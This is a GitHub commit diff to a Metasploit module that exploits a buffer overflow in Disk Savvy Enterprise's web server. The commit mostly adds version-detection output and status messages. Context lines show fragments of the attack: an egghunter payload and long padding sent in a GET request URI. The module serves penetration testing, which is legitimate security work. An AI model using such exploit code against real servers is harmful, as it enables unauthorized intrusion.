Skip to content

Commit bda464f

Browse files
committed
Increase output
1 parent e3043b0 commit bda464f

File tree

1 file changed

+9
-4
lines changed

1 file changed

+9
-4
lines changed

modules/exploits/windows/http/disksavvy_get_bof.rb

Lines changed: 9 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -77,9 +77,12 @@ def check
7777
)
7878

7979
if res && res.code == 200
80-
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
81-
return Exploit::CheckCode::Appears
82-
elsif res.body =~ /Disk Savvy Enterprise/
80+
version = res.body[/Disk Savvy Enterprise v[^<]*/]
81+
if version
82+
vprint_status("Version detected: #{version}")
83+
if version =~ /9\.(1|3)\.14/
84+
return Exploit::CheckCode::Appears
85+
end
8386
return Exploit::CheckCode::Detected
8487
end
8588
else
@@ -115,7 +118,7 @@ def exploit
115118
fail_with(Failure::NoTarget, 'No matching target')
116119
end
117120

118-
print_status("Selected Target: #{mytarget.name}")
121+
print_status("Selected target: #{mytarget.name}")
119122
end
120123

121124
eggoptions = {
@@ -137,6 +140,8 @@ def exploit
137140
sploit << hunter
138141
sploit << rand_text_alpha(4500)
139142

143+
print_status('Sending malicious request...')
144+
140145
send_request_cgi(
141146
'method' => 'GET',
142147
'uri' => sploit

0 commit comments

Comments
 (0)